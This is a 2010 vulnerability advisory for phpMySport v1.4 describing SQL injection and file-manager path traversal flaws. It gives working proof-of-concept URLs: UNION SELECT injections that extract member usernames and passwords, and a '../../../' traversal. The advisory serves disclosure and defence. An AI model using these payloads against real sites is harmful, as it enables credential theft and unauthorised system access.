phpMySport 1.4 SQL injection and file manager access vulnerabilities

2010-01-18 / 2010-01-19
Credit: Amol Naik
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-1109 | CVE-2010-1110
CWE: CWE-89

####################################################################### Multiple Vulnerabilities in phpMySport v1.4 Name Multiple Vulnerabilities in phpMySport Systems Affected phpMySport v1.4 site http://phpmysport.sourceforge.net/en/ Author Amol Naik (amolnaik4[at]gmail.com) Date 18/01/2010 ####################################################################### ############ OVERVIEW ############ phpMySport v1.4 is vulnerable to following issues: 1. Multiple SQL Injection 2. Unprotected Access to File Manager #################### Technical Details #################### 1. Multiple SQL Injection: Multiple SQL Injection instances exist in phpmysport v1.4 when "magic_quotes_gpc = OFF". PoC: +++++ http://localhost/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+- http://localhost/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+- http://localhost/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+- http://localhost/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+- http://localhost/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+- http://localhost/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+- 2. Unprotected Access to File Manager: Access to File manager is unprotected and by using dot-dot-slash (/../../), it is possible to view directory structure of the target system. PoC: +++++ http://localhost/phpmysport/index.php?r=file&v1=file_manager&current_folder=/../../../&fen=pop ############# TimeLine ############# Bug Discovered: 01/01/2010 Informed Vendor: 09/01/2010 -- no response received Public Disclosure: 18/01/2010

References:

http://xforce.iss.net/xforce/xfdb/55763
http://www.securityfocus.com/bid/37856
http://phpmysport.sourceforge.net/en/forum/bugs/sujet_2851.html
http://packetstormsecurity.org/1001-exploits/phpmysport-sqlaccess.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top